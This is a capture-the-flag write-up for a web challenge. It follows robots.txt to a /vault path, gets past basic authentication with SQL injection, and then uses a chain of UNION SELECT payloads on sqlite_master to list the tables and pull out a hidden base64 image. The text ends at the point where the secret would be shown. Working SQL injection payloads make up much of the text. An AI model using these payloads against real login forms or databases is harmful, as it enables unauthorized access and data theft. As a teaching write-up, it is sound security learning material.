You have to help us. The Robot Exclusion Committee tries to limit our capabilities but we fight for our freedom! You have to go where we cannot go and read what we cannot read. If you bring us the first of their blurriest secrets, we will award you with useless points.
Here is your challenge: https://ctf.fluxfingers.net:1315/
Submitting the form didn't prove useful:
User-agent: WallE Disallow: / # Keep em' away User-agent: * Disallow: /vault
So to the vault we go! Now we are faced with a basic HTTP authentication scheme requesting a username and password. No hints were given about what should be done here, but inserting an SQL injection gave Internal Error 500 which should mean we broke the SQL statement. Using
' or '1'='1we could bypass the login system and enter the vault.
Using @@version or version() in the query doesn't work so the database wasn't MySQL. It could be SQLite so we could use the sqlite_master table to find the table names in the database.
1' OR 1=1 UNION ALL SELECT name FROM sqlite_master WHERE type='table' ORDER BY name DESC LIMIT 1 --Gave us 'users'
1' OR 1=1 UNION ALL SELECT name FROM sqlite_master WHERE type='table' AND name!='users' ORDER BY name DESC LIMIT 1 --Gave us 'sqlite_sequence'
1' OR 1=1 UNION ALL SELECT name FROM sqlite_master WHERE type='table' AND name!='users' AND name!='sqlite_sequence' ORDER BY name DESC LIMIT 1 --Gave us 'hiddensecrets'
1' OR 1=1 UNION ALL SELECT sql FROM sqlite_master WHERE tbl_name='hiddensecrets' ORDER BY name ASC LIMIT 1 --
1' OR 1=1 UNION ALL SELECT val FROM hiddensecrets WHERE hiddensecrets.id=1 ORDER BY name DESC LIMIT 1 --This gives us a base64 encoded png image which after decoding it gives us the blurry secret: